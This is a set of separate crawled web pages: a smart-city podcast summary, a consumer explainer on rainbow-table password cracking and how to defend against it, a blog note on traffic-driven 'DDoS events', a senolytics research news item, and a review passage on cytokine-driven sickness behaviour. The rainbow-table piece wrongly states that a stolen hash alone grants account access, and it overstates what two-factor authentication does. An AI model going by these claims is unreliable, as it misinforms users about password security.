comprehensive group of all of the stakeholder needs focusing on the impact it has. Three steps are critical to successfully plan and implement a smart city. The first one is to define and understand the stakeholders’ communities and needs comprehensively. After following the problem, the second step refers to transforming the needs into measurable functional requirements. The last step is to develop test plans and move through the project life cycle and implementation. Efforts must be put into achieving the three pillars of sustainability: protection or enhancement of the natural environment, the protection or enhancement of human quality of life and its societal aspects, and the most controversial transposing the first two pillars in an economically sustainable manner. Larry O’Brien and Jim Fazer conclude that in the end, the smart city is about the quality of life for citizens and making sure we have a sustainable environment moving forward. The podcast is structured as follows: - The Nine Vertical Applications of a Smart City - The Seven Technologies that Impact a Smart City - Systems Engineering and Your Smart City - The Three Pillars of Sustainability and Your Smart City Project Read here the entire transcript of ARC Smart Cities Podcast Episode 1. For more resources on smart cities, visit the ARC Advisory Group website.
<urn:uuid:b3abcb4a-6ba7-491d-9973-4c4b33b44180>
CC-MAIN-2022-40
https://www.iiot-world.com/smart-cities-buildings-infrastructure/smart-cities/planning-a-smart-city-a-podcast-by-arc-advisory/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336921.76/warc/CC-MAIN-20221001195125-20221001225125-00021.warc.gz
en
0.929942
526
2.96875
3
Rainbow tables explained: Password hacking and how to prevent against it The name "rainbow table" may conjure up images of colorful furniture and dinner placements, but in actuality, it's a technology hackers use to try and commandeer information from your online accounts. Most websites advance their security to prevent this, but even trusted technology enterprises like Github have been subject to such attacks. Instances like the 2016 attack on the shopping site Taobao left over 20 million users, 1 out of every 20 of their annual shoppers, vulnerable. This article will shed light on exactly how hackers exploit weaknesses—particularly in passwords—and what you can do to keep your accounts as safe as possible. How hackers get your passwords Tools for password cracking and recovery like Hashcat are available on the internet for cybersecurity professionals to perform penetration testing on systems to ensure their security. The unfortunate consequence is that tools like this can also find their way into the hands of cyber criminals as well. To make websites as secure as possible, passwords aren't stored on a database themselves. Instead, when you create an account password, the website processes your password through a hashing algorithm. This algorithm uses the string of characters you chose as your password to store a longer, more secure string that is much more difficult to obtain. This means hackers don't obtain your password when they crack the website's database. The good news is that hashing is a one-way process, so your password can't be reverse-engineered from a discovered hash. The bad news? Hackers don't need your password once they find the hash; the hash is all they need to gain access. What is a rainbow table? Rainbow tables are large collections of data that store various common or weak passwords and the hashes that are created from those passwords. During a network attack, the rainbow table compares its hashes to the hashes in the database to crack the code and gain access to information. Hackers can then utilize this information to exploit a vulnerable network. How to defend against rainbow table attacks The measures you can take to keep your accounts safe from rainbow table attacks are extremely simple: - Use long, mixed-case, elaborate passwords - Don't use the same password for more than one account - Enable 2 factor authentication on every possible account Longer, more complex passwords mean more possibilities for a hacker to deal with. More possibilities equate to larger rainbow tables, which may demand more time than a hacker is willing to dedicate. You can even test the strength of your password to understand how much time it would take a hacker to crack your code. Make sure to not use the same password for everything. If you do, hackers could use the single hash they find to access every account you have. It would be like using the same key for every lock you own. If you want to make this easier, you can use password management software that keeps a list of complex passwords that can only be unlocked by a master password of your choice. Additionally, 2 factor authentication may be a slight annoyance every time you log in from a new device, but it's masterful at keeping your accounts protected. As long as you have this setting enabled, you'll be notified anytime someone tries to access your account. If you're curious about cybersecurity yourself, you can also check out the Kali Linux operating system designed for being a monitored space to play with penetration testing tools. Author Bio: As an English graduate, technology enthusiast, and Asian food connoisseur, Caleb is happy to talk tech with anyone. You can find more of his writings on caleb-writes.com.
<urn:uuid:58a4382c-4093-40e0-860c-fc53e0ed4eb8>
CC-MAIN-2022-40
https://www.minim.com/blog/rainbow-tables-explained-password-hacking-and-how-to-prevent-against-it
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00021.warc.gz
en
0.94295
740
3.078125
3
What is a Distributed Denial of Service (DDoS) event? It is different than a DDoS "attack". Some, such as Arbor Networks, have dubbed it "The Tiger Effect". June 2008's U.S. Open Golf Championship 19-hole playoff resulted in massive traffic spikes from those seeking real-time scores and streaming video feeds. DDoS events are a massive focus of interest that sometimes take place on the Internet. They are something that greatly exceeds normal demand, and the result is a Denial of Service effect. Web servers just can't meet demand when focus points occur and the timing is not so easily predicted. And even though DDoS events lack malicious intent, the results can often be just as painful as an attack… Here's a recent example from two weeks ago: North Carolina's unemployment rate is at its highest level in 25 years, and a deluge of out-of-work people has strained the state's jobless systems to the breaking point. State [websites] have crashed twice in the past month as people apply or renew their employment benefits.
<urn:uuid:c88d46b0-34de-46d5-9b60-05f106c9497a>
CC-MAIN-2022-40
https://archive.f-secure.com/weblog/archives/00001587.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00021.warc.gz
en
0.963055
226
2.578125
3
What’s the secret to aging well? University of Minnesota Medical School researchers have answered it- on a cellular level. Cell senescence is a process in which cells lose function, including the ability to divide and replicate, but are resistant to cell death. Such cells have been shown to affect neighboring ones because they secrete several pro-inflammatory and tissue remodeling molecules. Aging starts in our cells, and those aging cells can hasten cellular senescence, leading to tissue dysfunction and related health impacts. New research involving University of Minnesota Medical School faculty Paul D. Robbins and Laura J. Niedernhofer, recently published in Nature Medicine, shows there are types of small molecules called senolytics that can reverse the impact of aged, senescent cells. “We’ve always thought of aging as a process, not a disease,” said Dr. Robbins, Associate Director of the newly founded Institute on the Biology of Aging and Metabolism (iBAM). “But what if we can influence the impacts of aging at a cellular level to promote healthy aging? That’s what senolytics seeks to achieve.” The research determined whether introducing senescent cells to human and animal tissue would impact the cellular health of surrounding cells. Surprisingly, the transplant of a relatively small number of senescent cells caused persistent physical dysfunction as well as the spread of cellular senescence in previously healthy cells. In addition, researchers found that a high fat diet, which causes a type of metabolic stress, or simply being old, enhances the physical dysfunction that comes from senescent cells. “Previous research has shown that our immune system’s ability to eliminate or deal with senescent cells is based 30 percent on genetics and 70 percent on environment,” said Dr. Robbins, noting that what we eat and how often we exercise can affect senescence or aging of cells. Conversely, the researchers determined that treatment with senolytic drugs, able to eliminate senescent cells, can reverse physical dysfunction and actually extend lifespan even when used in aged animal models. “We saw greater activity, more endurance, and greater strength following use of senolytics,” said Dr. Robbins. The paper notes that the results provide proof-of-concept evidence that improved health and lifespan in animals is possible by targeting senescent cells. The hope is that senolytics will prove effective in alleviating physical dysfunction and resulting loss of independence in older adult humans as well. “This area of research is promising, not just to address the physical decline that comes with aging, but also to enhance the health of cancer survivors treated with radiation or chemotherapy – two treatments that can induce cell senescence,” said Laura Niedernhofer, Director of iBAM. This study was done in collaboration with James Kirkland, MD, Ph.D., and Tamara Tchkonia, Ph.D., Mayo Clinic. Source: Krystle Barbour – University of Minnesota Medical School Image Source: image is adapted from the University of Minnesota news release. Original Research: Abstract for “Senolytics improve physical function and increase lifespan in old age” by Ming Xu, Tamar Pirtskhalava, Joshua N. Farr, Bettina M. Weigand, Allyson K. Palmer, Megan M. Weivoda, Christina L. Inman, Mikolaj B. Ogrodnik, Christine M. Hachfeld, Daniel G. Fraser, Jennifer L. Onken, Kurt O. Johnson, Grace C. Verzosa, Larissa G. P. Langhi, Moritz Weigl, Nino Giorgadze, Nathan K. LeBrasseur, Jordan D. Miller, Diana Jurk, Ravinder J. Singh, David B. Allison, Keisuke Ejima, Gene B. Hubbard, Yuji Ikeno, Hajrunisa Cubro, Vesna D. Garovic, Xiaonan Hou, S. John Weroha, Paul D. Robbins, Laura J. Niedernhofer, Sundeep Khosla, Tamara Tchkonia & James L. Kirkland in Nature Medicine. Published July 9 2018.
<urn:uuid:7a7ff432-2386-4edf-83f1-2ee308cdf13b>
CC-MAIN-2022-40
https://debuglies.com/2018/10/03/a-new-study-reports-it-is-possible-to-reverse-the-effects-of-aging/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00221.warc.gz
en
0.897519
911
3.046875
3
Surrounded by coworkers who are sniffling and sneezing? You may not be able to ask for sick leave preemptively, but your body is already bracing for battle, says Patricia C. Lopes, assistant professor of biological sciences at Chapman University’s Schmid College of Science and Technology. Lopes studies how our bodies and behaviors change once we become sick. “Our physiology, particularly the immune system — the system that protects the body from invaders — is tightly regulated,” says Lopes. “Once we become sick, our physiology can drastically change to support recovery from the disease.” Lopes’ article in the British Ecological Society journal Functional Ecology “Anticipating infection: How parasitism risk changes animal physiology” highlights research showing that there are scenarios in which our physiology changes prior to becoming sick, when disease risk is high. “In other words,” Lopes, explains, “our brains can obtain information from diseased people and then elicit changes to our physiology. For example, observing images of sick people can already trigger activation of the immune system.” From a big picture perspective, this means that parasites affect our lives much more than previously considered, because they are already affecting our physiology even before they invade us, she says. “How this ability to change physiology before getting sick helps animals cope with, or recover from disease is not well known, but could have major impacts on how diseases spread, and on how we care for and study sick humans and other sick animals,” Lopes says. Immune activation, body and brain The body manages to respond to infectious agents, such as bacteria, yeast and viruses, with a common set of symptoms despite a lack of similarities between these types of pathogens. It does this by focusing the response through sentinel cells located throughout the body (Fig. 1). These first responders form the base of the innate immune system. Monocytes are considered critical first responders and monitor the circulating fluids whereas differentiated monocyte-derived cells monitor other fluids and are resident in all tissues (examples: peritoneal macrophages → peritoneal cavity; Kupffer cells → liver; giant cells and histiocytes → connective tissue; dust cells and alveolar macrophages → lungs; and osteoclasts → bone) (Douglas and Musson, 1986). These monocytic cells, along with resident dendritic cells, respond to a variety of signals including infectious agents and a variety of factors produced by the host organism that are released following trauma, autoimmune responses or abnormal accumulation of endogenous molecules (Magrone and Jirillo, 2012). In any case, the cells of the innate immune system then respond with the initiation of an inflammatory response that leads to a mirrored immune response within the central nervous system (CNS), often referred to as neuroinflammation. A bout of neuroinflammation results in behavioral consequences. Altered behavior is dependent on changes in neuronal activity, although specific loci within the CNS that mediate each of these responses have not been clearly defined. If the inflammatory response is fully resolved and does not involve death of cells within the brain, then behavior returns to normal. If neuroinflammation is extremely strong or prolonged, cell death within the CNS results in irreversible loss of function: functio laesa, identified as the fifth sign of acute inflammation. Focusing the innate immune response. Insults to the body, from the outside or from the inside, activate cells of the innate immune system. The immune response transmits this information to the brain to cause physiological and behavioral responses. A mild inflammatory response – such as a low-grade infection, trauma (such as dropping a weight on one’s foot) or even strenuous exercise – results in reversible consequences as they are a result of altered cellular (neuron) function. A severe response induces often irreversible consequences as a result of cell death. In either case, the causal event is initiated by monocytic and dendritic cells with the initiation of an inflammatory response. Recognition of infection is a first and most critical step in the development of an appropriate physiological response to fight infection and to initiate appropriate changes in behavior. Recognition of pathogens by monocytes and dendritic cells is mediated by several classes of receptors collectively referred to as pattern-recognition receptors (PRRs). Unlike receptors for cytokines, growth factors or hormones, which each recognize a specific moiety present only on a small subset of highly conserved ligands, PRRs recognize classes of molecules termed pathogen-associated molecular patterns (PAMPs). These patterns are not normally present on endogenous extracellular molecules derived from the host, although DAMPs (damage-associated molecular patterns) are found on molecules released from dying host cells that can activate PRRs (Jeannin et al., 2008). Thus, PAMPs are recognized by PRRs as non-self-molecules and DAMPs as self-molecules, both of which elicit activation of the innate immune system; one in an attempt to remove infectious materials and the other to remove damaged tissue. Fig. 2 illustrates the best-characterized members of the Toll-like receptors (TLRs), the most widely studied PRRs. In order to assure recognition of pathogens, TLRs have evolved to recognize proteins, lipids and unmodified nucleic acid molecules found on infectious pathogens. Extracellular pathogens, for example many bacteria, are recognized by trans-membrane TLRs that have their PAMP recognition moieties on the outside of the plasma membrane. TLRs 5, 11, 2/1 heterodimers, 2/6 heterodimers, 4 and 9 fall under this category. Intracellular pathogens, for example viruses or bacterial components released from extracellular pathogens that enter cells, are recognized by TLRs localized within the responsive cell. These TLRs are localized to endosomes and lysosomes within the cells. PAMP association with TLRs induces intracellular signaling cascades through two major pathways. Most of the TLRs associate with myeloid differentiation primary response gene 88 (MyD88), which is a universal adapter protein designed to recruit intracellular enzymes that initiate a cascade to eventually activate NF-κB (Fig. 2). Translocation of NF-κB to the cell nucleus directly activates gene transcription of, among other things, pro-inflammatory cytokines such as TNFα, IL-1β and type II interferon (IFNγ). Of the well-characterized TLRs, only TLR3, which responds to dsRNA, strictly associates with TRIF to activate IRF3 and directly induce the expression of type I interferons. TLR4 activates both pathways, and TLR9 induces type I interferon (IFNα) expression through NF-κB. Although there is considerable overlap and varying crosstalk across the MyD88 and TRIF pathways, the MyD88 response is more strongly keyed to fight bacterial infections whereas the induction of type I IFN plays a key role in fighting viral infections. Expression of cytokines by monocytic and dendritic cells then recruits and activates other cells of the immune system to fight infections. Classification of Toll-like receptors (TLRs). All TLRs recognize bacteria pathogen-associated molecular patterns (PAMPs) of protein, lipid or nucleotide composition. Approximately half recognize viral PAMPs, either lipids or nucleotides. TLR2/6 and TLR4 recognize fungal PAMPs whereas TLR9 and TLR11 recognize protozoan PAMPs. Several of the TLRs respond to extracellular ligands (1, 2, 4, 5, 6, 9 and 10 not shown) whereas others localize to cellular vesicles and respond to PAMPs that have been internalized by the cell (3, 7, 8, 9 and murine 11; human TLR11 is a pseudogene). Although some of the TLRs also activate proliferation of immune cells through an Akt-dependent pathway (not shown), they all induce the expression and secretion of cytokines. Cytokine production is largely responsible for behavioral changes induced by infection. All TLRs shown (TLR10 cooperates with TLR2 to recognize triacylated lipoproteins but does not activate typical TLR signaling) (Guan et al., 2010), except TLR3, directly induce the expression of TNFα, IL-1β and IFNγ whereas TLR3, 4, 7 and 9 activation results primarily in IFNα and IFNβ expression (Hanke and Kielian, 2011). A brief list of PAMPs or active analogs is shown for each TLR. For definitions, see List of abbreviations. Similar to TLRs, nucleotide-binding oligomerization domain (Nod) proteins initiate an inflammatory response following activation by peptidoglycans derived from bacteria (Fig. 3). Activation of Nod1 or Nod2 increases association of Nod proteins with RIPK or RICK. This association leads to eventual NF-κB activation and, like TLR activation, cytokine and type II interferon expression. Classification of nucleotide-binding oligomerization domain proteins (Nods). Similar to TLRs, Nod1 and Nod2 are pattern recognition receptors (PRRs) responding to pathogen-associated molecular patterns (PAMPs) of bacterial origin (Newton and Dixit, 2012). Both Nods are localized to the cytoplasm, requiring either phagocytosis of bacteria and subsequent peptidoglycan entry into the cytoplasm or uptake of peptidoglycan by endocytosis, peptide transporters or pore-forming toxins. Nod1 is distributed across tissues and cell types whereas Nod2 is localized principally to leucocytes but can be induced in epithelium (Clarke and Weiser, 2011; Newton and Dixit, 2012). The primary difference between TLRs and Nods (and Nod-like receptors, NLRs) is the identity of the ligand and intracellular pathway. RICK or RIPK/RIP-2 initiate the eventual activation of NF-κB, as compared to MyD88 or TRIF. Similar to TLRs, Nods induce the expression and secretion of cytokines. For definitions, see List of abbreviations. Pathways that mediate inflammation-induced behavior After recognition of the infectious agent, a signal must be received by the brain for behavioral changes to ensue. There are two major routes by which infections influence behavior. The neural and humoral routes both provide input to the brain (Fig. 4). When activated, both pathways elicit behavioral responses and, as described below, the importance of each pathway is dependent on the site of infection. The existence of a neural component is supported by early observations that sensory processing is necessary for development of heat and for the sensation of pain at the site of infection (these are two classic inflammation signs: calor and dolor). With the discovery of the blood–brain barrier (BBB), which was originally believed to exclude proteinaceous signals from the brain, afferent input was thought to be the major signaling pathway from the periphery to the brain that was responsible for behavioral changes. Neural and humoral activation of the brain by the periphery. Peripheral infections alter behavior by communicating with the brain via neural and humoral pathways. The neural pathway occurs via afferent nerves. As an example, the vagal nerve has a proven role in mediating infection-induced behavior. The afferent vagus projects to the nucleus tractus solitaries (NTS) → parabrachial nucleus (PB) → ventrolateral medulla (VLM) before proceeding to the paraventricular nucleus of the hypothalamus (PVN), supraoptic nucleus of the hypothalamus (SON), central amygdala (CEA) and bed nucleus of the stria terminalis (BNST). The CEA and BNST, which are part of the extended amygdala, then project to the periaqueductal gray (PAG). By these pathways, activation of the vagus by abdominal or visceral infections influences activity of several brain regions implicated in motivation and mood. The humoral pathway involves delivery of PAMPs or cytokines from the peripheral site of infection directly to the brain. Active transport into the brain across the blood–brain barrier (BBB), volume diffusion into the brain or direct contact with brain parenchymal cells at the choroid plexus (CP) and circumventricular organs [median eminence (ME), organum vasculosum of the laminae terminalis (OVLT, i.e. supraoptic crest), area postrema (AP) and suprafornical organ (SFO)] that lie outside the BBB all transpose the peripheral signal into a central neuroinflammatory response that mirrors the response at the periphery (Dantzer et al., 2008). Indeed, early studies found that lipopolysaccharide (LPS) given intraperitoneally (i.p.) caused a rapid increase in c-fos immunoreactivity within the nucleus tractus solitaries (NTS) (Wan et al., 1993). This marker of neuron activation localized to primary and secondary areas of projection of the vagus (Fig. 4). Similarly, the trigeminal nerve activates neurons within the hypothalamus known to control feeding behavior (Malick et al., 2001). Subdiaphragmatic vagotomy drastically reduces the sickness response to i.p. LPS, clearly illustrating that neural input to the brain is directly responsible for a significant part of the early behavioral changes associated with some infections (Bluthé et al., 1996a; Bluthé et al., 1996b; Bretdibat et al., 1995; Watkins et al., 1994). In contrast to these findings, vagotomy does not block the pyrogenic action of LPS when LPS is administered i.p. (Hansen et al., 2000; Luheshi et al., 2000). Vagotomy also does not block the induction of sickness behavior by i.v. (intravenous) or s.c. (subcutaneous) LPS (Bluthé et al., 1996a; Bluthé et al., 1996b). These later findings suggest that additional, humoral pathways are also able to mediate the ability of infections to modulate behavior. Even after vagotomy, i.p. LPS increases IL-1β levels within the brain (Van Dam et al., 2000) and vagotomy does not attenuate the ability of LPS to increase circulating cytokine levels (Gaykema et al., 2000; Hansen et al., 2000). When it was found that circulating cytokines could enter the brain by active transport, that cytokines could be produced at the BBB in response to circulating PAMPs and that cytokines could enter the brain by volume diffusion at the circumventricular organs (Fig. 4) (Quan and Banks, 2007), it was clear that behavioral responses that occur in response to i.v. and s.c. PAMPs or cytokines are transcribed by the brain in response to humoral signals. Similarly, some of the behaviors that occur in response to i.p. challenges have a humoral component even after vagotomy (Gaykema et al., 2000; Hansen et al., 2000). It is clear, however, that all behavioral responses to infection have a cytokine basis, as even i.p. LPS induces a CNS inflammatory response corresponding to the sites of c-fos activation by the vagal nerve afferent projections (Konsman et al., 2008). Thus, intraperitoneal or meningeal infections induce behavioral changes that are partially mediated by neural afferents through the vagal and trigeminal nerves, respectively. These afferent nerves induce an inflammatory response and cytokine expression in the brain, thereby providing the cytokine component of the neural pathway. In contrast, other peripheral sites of infection have a stronger dependence on the humoral pathway with the induction of local cytokines or release of PAMPs, which enter the circulation and then act directly at the level of the CNS. The level of infection is roughly proportionate to the level of CNS cytokine production and is related to the behavioral changes. One of the early issues that arose from these associations was the identity of the cytokines responsible for behavioral responses. IL-1β and behavior Cytokine intracellular signaling pathways. Cytokines bind to transmembrane allosterically regulated proteins. Upon ligand binding, the intracellular signaling pathways that are activated correlate to their ability to alter behavior. Three classic proinflammatory cytokines – TNFα, IL-1β and IL-6 – activate cascades leading to NF-κB and MAPK (p38 and JNK) activation. The MAPK cascade is enhanced by parallel signaling pathways that produce ceramide. In contrast, IFNγ, IFNα/β and IL-6 signal primarily through the JAK/STAT pathway. The NF-κB, MAPK and JAK/STAT pathways are considered proinflammatory, inducing a feed-forward cytokine inflammatory response. The ceramide-generating and MAPK pathways have distinct enhancing and inhibitory effects on neuron excitation. Expression of pattern recognition receptors (PRRs) and proinflammatory cytokine receptors in the brain. Although most infections occur at the periphery, the cells of the central nervous system (CNS) are the ultimate mediators of changes in behavior. Receptors within the CNS for pathogen-associated molecular patterns (PAMPs) and proinflammatory cytokines are divided into two categories, intracellular (green boxes) and those that span the plasma membrane. PAMPs reaching the CNS parenchyma can directly activate microglia, which, like other monocyte-derived cells, possess a full complement of TLRs. Thus, microglia are able to respond to PAMPs or peripherally derived cytokines with a central induction of proinflammatory cytokine expression. Astrocytes and neurons have a very limited ability to respond to PAMPs. Neurons only possess intracellular TLRs and Nod2. In contrast, neurons have cell surface receptors for proinflammatory cytokines, TNFα (Bette et al., 2003), IL-1β (French et al., 1999), low expression of IL-6 (Lehtimäki et al., 2003), type I IFNα/β (Paul et al., 2007) and limited (region-specific) expression of the type II IFNγ receptor (Chesler and Reiss, 2002). The absence of most of the bacterial recognition TLRs on neurons indicates that the effects of an extracellular bacterial infection on behavior are secondary to activation of other cells of the CNS, primarily microglia. In contrast, neurons are directly responsive to cytokines. By far the most abundant literature related to IL-1β regards its action as a pro-inflammatory cytokine, i.e. induction of local inflammation, immune cell recruitment and necessity to rapidly clear infections. The IL-1β → IL-1R1 → NF-κB pathway is predominant in monocytes, including brain microglia (Srinivasan et al., 2004), and this pathway leads to elevated cytokine expression, further monocyte/microglia activation and astrocyte activation within the CNS. By themselves, these actions have no direct means to alter behavior as neuron function per se is not altered. In contrast, IL-1β interaction with IL-1R1 on neurons has a greater induction of the MAPK pathways and MyD88-dependent Src activation (Davis et al., 2006; Srinivasan et al., 2004) than it does with non-neuronal cells. Within the hippocampus, IL-1β acts through the MAPKs, p38 and JNK (Fig. 5) to inhibit neuron long-term potentiation (LTP) via an inhibition of calcium channels (Schäfers and Sorkin, 2008; Viviani et al., 2007). In contrast, IL-1β may also have a direct excitatory effect on neurons mediated by an increase in ceramide (a family of lipids that act as intracellular signaling molecules) synthesis and subsequent NMDA-mediated calcium influx (Viviani et al., 2003). Thus, the presence of IL-1β within the CNS directly alters neuron function. Despite these responses by neurons, it remains unknown if either inhibition of LTP, via MAPKs, or neuron excitation, via ceramide, is responsible for IL-1β’s ability to act within the CNS to induce sickness behavior. However, it is clear that IL-1β administered at very low levels induces a potent sickness response (Bluthé et al., 2006). Of note, to date there are no reports that IL-1β is necessary for the development of depressive-like behaviors. TNFα and behavior TNFα within the brain can derive from peripheral expression, expression within the brain dependent on neural input (Marquette et al., 2003), secretion within the brain in response to humoral stimuli by PAMPs or cytokines (Bluthé et al., 2002; Churchill et al., 2006; Park et al., 2011b) or exogenous addition to the brain (Bluthé et al., 2006). Current dogma suggests that all sources have the same behavioral effect: TNFα induces sickness behavior, reminiscent of the actions of IL-1β. TNFα administration to the periphery causes the entire spectrum of sickness, including fever, weight loss and changes in motivated behavior (Bluthé et al., 1994). There is a strong correlation between infection-related TNFα expression in the periphery and the degree of sickness behavior, as blocking cytokine expression during inflammation attenuates sickness behavior (O’Connor et al., 2009b). TNFα was shown to act through TNF-R1 to induce sickness (Palin et al., 2007). Mice lacking TNF-R2 respond to TNFα with a full spectrum of sickness whereas TNF-R1 KO mice are refractory to TNFα. This finding supported earlier work using human recombinant TNFα, which binds murine TNF-R1 but not murine TNF-R2 and induces sickness behavior (Bluthé et al., 1991; Bluthé et al., 1994). Unlike the IL-1R2, TNF-R2 is a fully functional trans-membrane receptor that signals similar to TNF-R1 except for an inability to activate ceramide synthesis (MacEwan, 2002). Importantly, within the brain, TNF-R1 is localized primarily to neurons and TNF-R2 is localized primarily to glia (Fig. 6). This finding, together with the KO experiments, suggests that TNFα induces behavioral changes by interacting with neuronal TNF-R1. TNFα changes NMDA-R processing through ceramide via TNR-R1, in one case increasing NR1 phosphorylation and clustering via activation of ceramide production (Wheeler et al., 2009). Through this mechanism, TNFα increases hippocampal neuron calcium flux and excitatory postsynaptic currents (EPSCs). In separate studies, the effect of TNFα was found to be related to time of exposure. A short exposure to TNFα enhances synaptic transmission, EPSCs and AMPA-R insertion into neuronal membranes whereas a longer exposure, more than 50 min, inhibits LTP (Beattie et al., 2002; Tancredi et al., 1992). Whether AMPA-R insertion or decreased LTP is ceramide dependent in these later examples is unknown; however, prolonged exposure to TNFα decreases Ca2+ currents in response to glutamate and this action was mimicked by added ceramide (Furukawa and Mattson, 1998). Thus, as for IL-1β, TNFα directly acts on neurons to alter excitation through the stimulation of ceramide synthesis. Importantly, ceramide production by TNFα occurs through the activation of neutral-sphingomyelinase (N-SMase) (Fig. 5). N-SMase activation requires the activation of factor-associated with N-SMase (FAN). We used FAN-deficient mice to show that this pathway is required for TNFα-, but not LPS-, induced sickness behavior (Palin et al., 2009). The induction of sickness by TNFα also required TNF-R1 and not TNF-R2, only the former activating ceramide synthesis through FAN (Palin et al., 2009). LPS was still able to induce sickness in the absence of FAN, suggesting that the induction of other cytokines, such as IL-1β, is adequate to induce sickness and that their actions are not FAN dependent. These data, however, do show that TNFα-induced sickness behaviors require ceramide production via TNF-R1 on neurons. These data also strongly suggest that IL-1β-induced ceramide production and subsequent changes in neuron activity may mediate its behavior-modifying activity. Although data pertaining to ceramide production suggest a mechanism of action for both IL-1β- and TNFα-induced sickness, the MAPK pathway is also required for TNFα to induce sickness. An inhibitor of JNK activation, D-JNKI-1, blocks TNFα-induced sickness (Palin et al., 2008). As mentioned above, TNF-R1 is primarily localized to neurons within the CNS (Bette et al., 2003). It is not known if the activation of JNK by TNFα, as a prerequisite for sickness, occurs within neurons or within glia through TNF-R2 (Fig. 5). Attenuation of glia activation by the inhibition of JNK could act to decrease the net inflammatory response (Relja et al., 2009) and thus decrease the ability of the brain to express cytokines, which could then act on neurons. In any case, it is clear that proinflammatory cytokines act by at least two pathways to fully induce sickness. There is new direct evidence that TNFα may be involved in depressive-like behavior. A very recent study (Kaster et al., 2012) used extremely low doses of TNFα administered i.c.v. to show that TNFα within the brain causes depressive-like behavior. Depressive-like behavior was assessed as increased time of immobility during the FST and TST. This low dose of TNFα did not change locomotor activity (an index of sickness behavior), thus dissociating the two types of behavior as TNFα sensitive and TNFα insensitive (Kaster et al., 2012). They also showed that TNF-R1-deficient mice and mice treated with a neutralizing antibody to TNFα had a decreased time of immobility during the FST, an anti-depressant response. No such direct evidence is available wherein IL-1R1 mediates depressive-like behavior. This study supports earlier work showing that TNF-R1- or TNF-R2-deficient mice have a lower immobility during the FST, indicative of attenuated helplessness/despair. These mice also have increased consumption of a sucrose solution, indicative of a hedonic response being mediated through TNF-Rs. These mice have normal LMA, indicative of the absence of sickness behavior, and unchanged performance in an elevated plus maze; thus, no evidence for changes in anxiety (Simen et al., 2006). Thus, the loss of either neuronal TNF-R1 or glial TNF-R2 elicits an anti-depressant response. Taken together, these data indicate that both TNF-R1 and TNF-R2 are involved in depressive-like behavior. IL-6 and behavior Unlike IL-1β and TNFα, IL-6 does not, by itself, elicit behavioral changes despite the induction of fever and activation of the hypothalamic-pituitary-adrenal (HPA) axis (Lenczowski et al., 1999). These data can be interpreted in several ways but they suggest that induction of fever and an HPA response are not directly responsible for behavioral changes and are indeed distinct responses. These data do not suggest that IL-6 has no effect on behavior. In contrast, IL-6 is necessary for a full sickness response. Soluble gp130, a natural inhibitor of interleukin-6 receptor trans-signaling responses, administered i.c.v. prior to LPS enhances recovery from sickness. Soluble gp130 in both in vivo and in vitro models decreases IL-6 signaling, STAT phosphorylation, and the expression of the pro-inflammatory cytokines IL-6 and TNFα but not IL-1β (Burton et al., 2011). Using a genetic KO model, IL-6 deficiency decreases the sickness response to i.p. administration of LPS or IL-1β and the sickness response to i.c.v. LPS or IL-1β (Bluthé et al., 2000b). Thus, normal IL-6 is required for sickness behaviors, but IL-6 alone is insufficient to directly induce sickness. Major depression in patients has been correlated to circulating IL-6 levels. These data provided some of the early evidence that depression may be related to a tonic state of immune activation (Dantzer, 2006). Although there is no evidence that IL-6 induces depression, similar to sickness behavior, mice deficient for IL-6 have diminished depressive-like behavior, illustrated by decreased time of immobility in the FST and TST and a greater preference for a sucrose solution, suggesting lower despair and diminished anhedonia (Chourbaji et al., 2006). Following s.c. LPS, Sprague-Dawley rats elicit typical sickness with a fever and decreased LMA, assessed as running wheel activity (Harden et al., 2006; Harden et al., 2011). Interestingly, treatment with anti-IL-6 blocked the LPS-induced decrease in LMA; however, treatment with anti-TNFα or anti-IL-1β were without effect. These data support the hypothesis that IL-6 is necessary for sickness behavior. Inactivation of either TNFα or IL-1β is insufficient to prevent sickness behavior, in agreement with the aforementioned need for only one of these two cytokines for sickness behavior (Bluthé et al., 2000a). There are two possible explanations by which IL-6 is ineffective in itself as an inducer of changes in behavior. One likely candidate is the low level of IL-6 receptors within the brain (Fig. 6). It is possible that the inflammatory response to IL-6 alone is weaker than that of other pro-inflammatory cytokines such as TNFα and IL-1β. However, a stronger candidate is the type of intracellular signaling that occurs post-IL-6R activation (Fig. 5). IL-6 activates the same MAPK and NF-κB pathways as do TNFα and IL-1β and, in addition, activates the JAK → STAT pathway. All three of these pathways lead to an inflammatory response and, in particular, the induction of pro-inflammatory cytokines. However, there is no evidence that IL-6 stimulates ceramide synthesis, which we have implicated in neuron-mediated cytokine-dependent sickness behavior (Palin et al., 2009). Thus, IL-6 is required for a feed-forward loop that amplifies neuroinflammation and CNS cytokine levels, probably by glial expression. In the absence of IL-6, central cytokines do not reach critical levels to induce full-blown sickness behaviors. On the other hand, either TNFα or IL-1β (but not necessarily both) are also needed to induce CNS cytokine expression primarily by glia, but at least one of these is needed to generate ceramide production by neurons and thereby alter neuronal activity. Ceramide production further enhances the MAPK pathways (Kyriakis and Avruch, 2001), leading to an accentuation of the inflammatory pathway in response to cytokines (Fig. 5). Ceramide itself does not signal pro-inflammatory cytokine expression but is a specific MAPK and maybe NF-κB pathway accentuator (Medvedev et al., 1999; Sakata et al., 2007). In brief, low IL-6 results in inadequate neuroinflammation whereas low TNFα + IL-1β results in inadequate neuronal dysfunction. In either case, no sickness behavior occurs. Whether this combination of pathways is involved in depressive-like behaviors has not been directly addressed. Interferons (IFNs) and behavior IFNα has been used to activate the innate immune response to treat patients with viral infections (for example hepatitis C) or cancer. At the onset of treatment, patients develop full-blown sickness behavior. Patients experience fatigue, pain, anorexia and fever. After several weeks of cytokine therapy, approximately one-third of the patients elicit behavioral symptoms of depression (Capuron et al., 2004; Raison et al., 2009). Despite this strong effect with human subjects, the preclinical evidence that IFNs directly induce sickness behavior is lacking. However, O’Connor studied IFNγR-deficient mice infected with Bacillus Calmette-Guérin (BCG) and found that BCG induced the expression of IFNγ within brains and lungs of IFNγR-deficient and wild-type mice (O’Connor et al., 2009a). Even in the absence of IFNγR, mice developed a normal sickness response, suggesting that IFNγ is not required for a sickness response. Similarly, treatment of rats with IFNα does not induce sickness behavior 